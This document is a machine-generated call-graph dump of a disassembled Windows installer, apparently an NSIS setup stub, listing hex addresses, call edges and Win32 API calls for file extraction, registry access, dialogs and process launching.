3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3966 403c83 3640->3966 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4023 406009 lstrcpynW 3651->4023 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4024 405e50 GetFileAttributesW CreateFileW 3674->4024 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4027 406009 lstrcpynW 3684->4027 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4025 405f51 wsprintfW 3696->4025 4026 406009 lstrcpynW 3696->4026 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4028 406a99 lstrcpyW 3704->4028 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3965 406009 lstrcpynW 3820->3965 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3915 40160c 3834->3915 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3915 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3942 40145c 3842->3942 3859 40145c 18 API calls 3843->3859 3957 401446 3844->3957 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3915 3847->3915 3964 405f51 wsprintfW 3847->3964 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3915 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3915 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3915 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3915 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3915 3879 4062a3 11 API calls 3868->3879 3869->3915 3870->3915 3871->3915 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3960 4062d5 FindFirstFileW 3874->3960 3885 40197f 3875->3885 3928 4019a1 3875->3928 3877 40169a 3887 4062a3 11 API calls 3877->3887 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3910 4062d5 2 API calls 3885->3910 3885->3928 3895 4016a7 3887->3895 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3915 3908 404f72 25 API calls 3892->3908 3904 4016b1 Sleep 3895->3904 3905 4016ae 3895->3905 3896 4019b8 GetShortPathNameW 3896->3915 3906 4018f5 3897->3906 3898->3915 3899->3915 3907 4062a3 11 API calls 3900->3907 3901 4018c2 3911 4062a3 11 API calls 3901->3911 3902 4018a9 3909 4062a3 11 API calls 3902->3909 3904->3915 3905->3904 3913 4062a3 11 API calls 3906->3913 3907->3915 3908->3915 3909->3915 3914 401991 3910->3914 3911->3915 3912 4017d4 3916 401864 3912->3916 3919 405d06 CharNextW 3912->3919 3937 4062a3 11 API calls 3912->3937 3917 401902 MoveFileW 3913->3917 3914->3928 3963 406009 lstrcpynW 3914->3963 3915->3832 3916->3892 3918 40186e 3916->3918 3920 401912 3917->3920 3921 40191e 3917->3921 3922 404f72 25 API calls 3918->3922 3924 4017e6 CreateDirectoryW 3919->3924 3920->3892 3926 401942 3921->3926 3931 4062d5 2 API calls 3921->3931 3927 401875 3922->3927 3924->3912 3925 4017fe GetLastError 3924->3925 3929 401827 GetFileAttributesW 3925->3929 3930 40180b GetLastError 3925->3930 3936 4062a3 11 API calls 3926->3936 3956 406009 lstrcpynW 3927->3956 3928->3896 3928->3915 3929->3912 3933 4062a3 11 API calls 3930->3933 3934 401929 3931->3934 3933->3912 3934->3926 3939 406c68 42 API calls 3934->3939 3935 401882 SetCurrentDirectoryW 3935->3915 3938 40195c 3936->3938 3937->3912 3938->3915 3940 401936 3939->3940 3941 404f72 25 API calls 3940->3941 3941->3926 3943 406805 18 API calls 3942->3943 3944 401488 3943->3944 3945 401497 3944->3945 3946 406038 5 API calls 3944->3946 3947 4062a3 lstrlenW wvsprintfW 3945->3947 3946->3945 3948 4060e7 9 API calls 3947->3948 3949 4017c9 3948->3949 3950 405d59 CharNextW CharNextW 3949->3950 3951 405d76 3950->3951 3952 405d88 3950->3952 3951->3952 3953 405d83 CharNextW 3951->3953 3954 405dac 3952->3954 3955 405d06 CharNextW 3952->3955 3953->3954 3954->3912 3955->3952 3956->3935 3958 406805 18 API calls 3957->3958 3959 401455 3958->3959 3959->3877 3961 4018a5 3960->3961 3962 4062eb FindClose 3960->3962 3961->3901 3961->3902 3962->3961 3963->3928 3964->3915 3965->3822 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 CoUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3653 4024->3677 4025->3696 4026->3696 4027->3685 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3706 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4941 402a84 4942 401553 19 API calls 4941->4942 4943 402a8e 4942->4943 4944 401446 18 API calls 4943->4944 4945 402a98 4944->4945 4946 401a13 4945->4946 4947 402ab2 RegEnumKeyW 4945->4947 4948 402abe RegEnumValueW 4945->4948 4949 402a7e 4947->4949 4948->4946 4948->4949 4949->4946 4950 4029e4 RegCloseKey 4949->4950 4950->4946 4951 402c8a 4952 402ca2 4951->4952 4953 402c8f 4951->4953 4955 40145c 18 API calls 4952->4955 4954 401446 18 API calls 4953->4954 4957 402c97 4954->4957 4956 402ca9 lstrlenW 4955->4956 4956->4957 4958 402ccb WriteFile 4957->4958 4959 401a13 4957->4959 4958->4959 4960 40400d 4961 40406a 4960->4961 4962 40401a lstrcpynA lstrlenA 4960->4962 4962->4961 4963 40404b 4962->4963 4963->4961 4964 404057 GlobalFree 4963->4964 4964->4961 4965 401d8e 4966 40145c 18 API calls 4965->4966 4967 401d95 ExpandEnvironmentStringsW 4966->4967 4968 401da8 4967->4968 4970 401db9 4967->4970 4969 401dad lstrcmpW 4968->4969 4968->4970 4969->4970 4971 401e0f 4972 401446 18 API calls 4971->4972 4973 401e17 4972->4973 4974 401446 18 API calls 4973->4974 4975 401e21 4974->4975 4976 4030e3 4975->4976 4978 405f51 wsprintfW 4975->4978 4978->4976 4979 402392 4980 40145c 18 API calls 4979->4980 4981 402399 4980->4981 4984 4071f8 4981->4984 4985 406ed2 25 API calls 4984->4985 4986 407218 4985->4986 4987 407222 lstrcpynW lstrcmpW 4986->4987 4988 4023a7 4986->4988 4989 407254 4987->4989 4990 40725a lstrcpynW 4987->4990 4989->4990 4990->4988 4061 402713 4076 406009 lstrcpynW 4061->4076 4063 40272c 4077 406009 lstrcpynW 4063->4077 4065 402738 4066 40145c 18 API calls 4065->4066 4068 402743 4065->4068 4066->4068 4067 402752 4070 40145c 18 API calls 4067->4070 4072 402761 4067->4072 4068->4067 4069 40145c 18 API calls 4068->4069 4069->4067 4070->4072 4071 40145c 18 API calls 4073 40276b 4071->4073 4072->4071 4074 4062a3 11 API calls 4073->4074 4075 40277f WritePrivateProfileStringW 4074->4075 4076->4063 4077->4065 4991 402797 4992 40145c 18 API calls 4991->4992 4993 4027ae 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027b7 4994->4995 4996 40145c 18 API calls 4995->4996 4997 4027c0 GetPrivateProfileStringW lstrcmpW 4996->4997 4998 402e18 4999 40145c 18 API calls 4998->4999 5000 402e1f FindFirstFileW 4999->5000 5001 402e32 5000->5001 5006 405f51 wsprintfW 5001->5006 5003 402e43 5007 406009 lstrcpynW 5003->5007 5005 402e50 5006->5003 5007->5005 5008 401e9a 5009 40145c 18 API calls 5008->5009 5010 401ea1 5009->5010 5011 401446 18 API calls 5010->5011 5012 401eab wsprintfW 5011->5012 4288 401a1f 4289 40145c 18 API calls 4288->4289 4290 401a26 4289->4290 4291 4062a3 11 API calls 4290->4291 4292 401a49 4291->4292 4293 401a64 4292->4293 4294 401a5c 4292->4294 4342 406009 lstrcpynW 4293->4342 4341 406009 lstrcpynW 4294->4341 4297 401a62 4301 406038 5 API calls 4297->4301 4298 401a6f 4299 406722 3 API calls 4298->4299 4300 401a75 lstrcatW 4299->4300 4300->4297 4303 401a81 4301->4303 4302 4062d5 2 API calls 4302->4303 4303->4302 4304 405e30 2 API calls 4303->4304 4306 401a98 CompareFileTime 4303->4306 4307 401ba9 4303->4307 4311 4062a3 11 API calls 4303->4311 4315 406009 lstrcpynW 4303->4315 4321 406805 18 API calls 4303->4321 4328 405ca0 MessageBoxIndirectW 4303->4328 4332 401b50 4303->4332 4339 401b5d 4303->4339 4340 405e50 GetFileAttributesW CreateFileW 4303->4340 4304->4303 4306->4303 4308 404f72 25 API calls 4307->4308 4310 401bb3 4308->4310 4309 404f72 25 API calls 4312 401b70 4309->4312 4313 40337f 37 API calls 4310->4313 4311->4303 4316 4062a3 11 API calls 4312->4316 4314 401bc6 4313->4314 4317 4062a3 11 API calls 4314->4317 4315->4303 4323 401b8b 4316->4323 4318 401bda 4317->4318 4319 401be9 SetFileTime 4318->4319 4320 401bf8 CloseHandle 4318->4320 4319->4320 4322 401c09 4320->4322 4320->4323 4321->4303 4324 401c21 4322->4324 4325 401c0e 4322->4325 4327 406805 18 API calls 4324->4327 4326 406805 18 API calls 4325->4326 4329 401c16 lstrcatW 4326->4329 4330 401c29 4327->4330 4328->4303 4329->4330 4331 4062a3 11 API calls 4330->4331 4333 401c34 4331->4333 4334 401b93 4332->4334 4335 401b53 4332->4335 4336 405ca0 MessageBoxIndirectW 4333->4336 4337 4062a3 11 API calls 4334->4337 4338 4062a3 11 API calls 4335->4338 4336->4323 4337->4323 4338->4339 4339->4309 4340->4303 4341->4297 4342->4298 5013 40209f GetDlgItem GetClientRect 5014 40145c 18 API calls 5013->5014 5015 4020cf LoadImageW SendMessageW 5014->5015 5016 4030e3 5015->5016 5017 4020ed DeleteObject 5015->5017 5017->5016 5018 402b9f 5019 401446 18 API calls 5018->5019 5024 402ba7 5019->5024 5020 402c4a 5021 402bdf ReadFile 5023 402c3d 5021->5023 5021->5024 5022 401446 18 API calls 5022->5023 5023->5020 5023->5022 5030 402d17 ReadFile 5023->5030 5024->5020 5024->5021 5024->5023 5025 402c06 MultiByteToWideChar 5024->5025 5026 402c3f 5024->5026 5028 402c4f 5024->5028 5025->5024 5025->5028 5031 405f51 wsprintfW 5026->5031 5028->5023 5029 402c6b SetFilePointer 5028->5029 5029->5023 5030->5023 5031->5020 5032 402b23 GlobalAlloc 5033 402b39 5032->5033 5034 402b4b 5032->5034 5035 401446 18 API calls 5033->5035 5036 40145c 18 API calls 5034->5036 5037 402b41 5035->5037 5038 402b52 WideCharToMultiByte lstrlenA 5036->5038 5039 402b93 5037->5039 5040 402b84 WriteFile 5037->5040 5038->5037 5040->5039 5041 402384 GlobalFree 5040->5041 5041->5039 5043 4044a5 5044 404512 5043->5044 5045 4044df 5043->5045 5047 40451f GetDlgItem GetAsyncKeyState 5044->5047 5054 4045b1 5044->5054 5111 405c84 GetDlgItemTextW 5045->5111 5050 40453e GetDlgItem 5047->5050 5057 40455c 5047->5057 5048 4044ea 5051 406038 5 API calls 5048->5051 5049 40469d 5109 404833 5049->5109 5113 405c84 GetDlgItemTextW 5049->5113 5052 403d3f 19 API calls 5050->5052 5053 4044f0 5051->5053 5056 404551 ShowWindow 5052->5056 5059 403e74 5 API calls 5053->5059 5054->5049 5060 406805 18 API calls 5054->5060 5054->5109 5056->5057 5062 404579 SetWindowTextW 5057->5062 5067 405d59 4 API calls 5057->5067 5058 403dca 8 API calls 5063 404847 5058->5063 5064 4044f5 GetDlgItem 5059->5064 5065 40462f SHBrowseForFolderW 5060->5065 5061 4046c9 5066 40677e 18 API calls 5061->5066 5068 403d3f 19 API calls 5062->5068 5069 404503 IsDlgButtonChecked 5064->5069 5064->5109 5065->5049 5070 404647 CoTaskMemFree 5065->5070 5071 4046cf 5066->5071 5072 40456f 5067->5072 5073 404597 5068->5073 5069->5044 5074 406722 3 API calls 5070->5074 5114 406009 lstrcpynW 5071->5114 5072->5062 5078 406722 3 API calls 5072->5078 5075 403d3f 19 API calls 5073->5075 5076 404654 5074->5076 5079 4045a2 5075->5079 5080 40468b SetDlgItemTextW 5076->5080 5085 406805 18 API calls 5076->5085 5078->5062 5112 403d98 SendMessageW 5079->5112 5080->5049 5081 4046e6 5083 4062fc 3 API calls 5081->5083 5092 4046ee 5083->5092 5084 4045aa 5088 4062fc 3 API calls 5084->5088 5086 404673 lstrcmpiW 5085->5086 5086->5080 5089 404684 lstrcatW 5086->5089 5087 404730 5115 406009 lstrcpynW 5087->5115 5088->5054 5089->5080 5091 404739 5093 405d59 4 API calls 5091->5093 5092->5087 5097 406751 2 API calls 5092->5097 5098 404785 5092->5098 5094 40473f GetDiskFreeSpaceW 5093->5094 5096 404763 MulDiv 5094->5096 5094->5098 5096->5098 5097->5092 5100 4047e2 5098->5100 5101 4043ad 21 API calls 5098->5101 5099 404805 5116 403d85 KiUserCallbackDispatcher 5099->5116 5100->5099 5102 40141d 80 API calls 5100->5102 5103 4047d3 5101->5103 5102->5099 5105 4047e4 SetDlgItemTextW 5103->5105 5106 4047d8 5103->5106 5105->5100 5107 4043ad 21 API calls 5106->5107 5107->5100 5108 404821 5108->5109 5117 403d61 5108->5117 5109->5058 5111->5048 5112->5084 5113->5061 5114->5081 5115->5091 5116->5108 5118 403d74 SendMessageW 5117->5118 5119 403d6f 5117->5119 5118->5109 5119->5118 5120 402da5 5121 4030e3 5120->5121 5122 402dac 5120->5122 5123 401446 18 API calls 5122->5123 5124 402db8 5123->5124 5125 402dbf SetFilePointer 5124->5125 5125->5121 5126 402dcf 5125->5126 5126->5121 5128 405f51 wsprintfW 5126->5128 5128->5121 5129 4030a9 SendMessageW 5130 4030c2 InvalidateRect 5129->5130 5131 4030e3 5129->5131 5130->5131 5132 401cb2 5133 40145c 18 API calls 5132->5133 5134 401c54 5133->5134 5135 4062a3 11 API calls 5134->5135 5138 401c64 5134->5138 5136 401c59 5135->5136 5137 406c9b 81 API calls 5136->5137 5137->5138 4088 4021b5 4089 40145c 18 API calls 4088->4089 4090 4021bb 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021c4 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021cd 4093->4094 4095 40145c 18 API calls 4094->4095 4096 4021d6 4095->4096 4097 404f72 25 API calls 4096->4097 4098 4021e2 ShellExecuteW 4097->4098 4099 40221b 4098->4099 4100 40220d 4098->4100 4102 4062a3 11 API calls 4099->4102 4101 4062a3 11 API calls 4100->4101 4101->4099 4103 402230 4102->4103 5146 402238 5147 40145c 18 API calls 5146->5147 5148 40223e 5147->5148 5149 4062a3 11 API calls 5148->5149 5150 40224b 5149->5150 5151 404f72 25 API calls 5150->5151 5152 402255 5151->5152 5153 405c3f 2 API calls 5152->5153 5154 40225b 5153->5154 5155 4062a3 11 API calls 5154->5155 5158 4022ac CloseHandle 5154->5158 5161 40226d 5155->5161 5157 4030e3 5158->5157 5159 402283 WaitForSingleObject 5160 402291 GetExitCodeProcess 5159->5160 5159->5161 5160->5158 5163 4022a3 5160->5163 5161->5158 5161->5159 5162 406332 2 API calls 5161->5162 5162->5159 5165 405f51 wsprintfW 5163->5165 